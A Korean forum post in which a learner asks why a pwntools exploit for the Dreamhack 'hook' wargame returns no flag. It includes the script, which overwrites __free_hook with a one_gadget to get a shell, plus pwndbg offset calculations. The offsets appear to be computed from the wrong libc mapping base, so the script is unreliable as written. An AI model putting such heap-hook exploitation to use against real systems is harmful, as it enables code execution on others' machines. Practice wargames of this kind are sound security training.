hook 워게임 과제하는 중인데 flag가 안나오는데 잘못된 부분이 있을까요?
직접 offset 구해서 hook overwrite를 하였는데 flag가 도출이 안됩니다.
도와주세요!

코드
from pwn import*

p = remote("host1.dreamhack.games", 9373)

e = ELF("./hook")
libc = ELF("./libc.so.6")

p.recvuntil("stdout: ")
libc_stdout = int(p.recvuntil("\n").strip("\n"),16)

libc_base = libc_stdout - 0x205760
malloc_hook = libc_base + 0x204c30
free_hook = libc_base + 0x2068e8
oneshot_gadget = libc_base + 0x4526a

payload = p64(free_hook) + p64(oneshot_gadget)

p.sendlineafter("Size: ", "400")

p.sendlineafter("Data: ", payload)

p.interactive()

offset 구하는법

pwndbg> p &mallochook
$1 = (void ()(sizet, const void )) 0x7ffff7dcdc30 <mallochook>
pwndbg> p &freehook
$2 = (void ()(void , const void )) 0x7ffff7dcf8e8 <freehook>
pwndbg> vmmap libc
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
0x7ffff79e2000 0x7ffff7bc9000 r-xp 1e7000 0 /lib/x8664-linux-gnu/libc-2.27.so
0x7ffff7bc9000 0x7ffff7dc9000 ---p 200000 1e7000 /lib/x8664-linux-gnu/libc-2.27.so
0x7ffff7dc9000 0x7ffff7dcd000 r--p 4000 1e7000 /lib/x8664-linux-gnu/libc-2.27.so
0x7ffff7dcd000 0x7ffff7dcf000 rw-p 2000 1eb000 /lib/x8664-linux-gnu/libc-2.27.so
pwndbg> p/x 0x7ffff7dcdc30 - 0x7ffff7bc9000
$3 = 0x204c30
pwndbg> p/x 0x7ffff7dcf8e8 - 0x7ffff7bc9000
$4 = 0x2068e8
pwndbg> quit
hyunmin@WMRRD11-NC102M3:~/hyunmin/hook$ onegadget libc.so.6
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL

0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL

0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL

0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL

0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL*

pwndbg> p stdout
$1 = (struct _IO_FILE *) 0x7ffff7dce760 <IO_2_1_stdout>
pwndbg> p/x 0x7ffff7dce760 - 0x7ffff7bc9000
$2 = 0x205760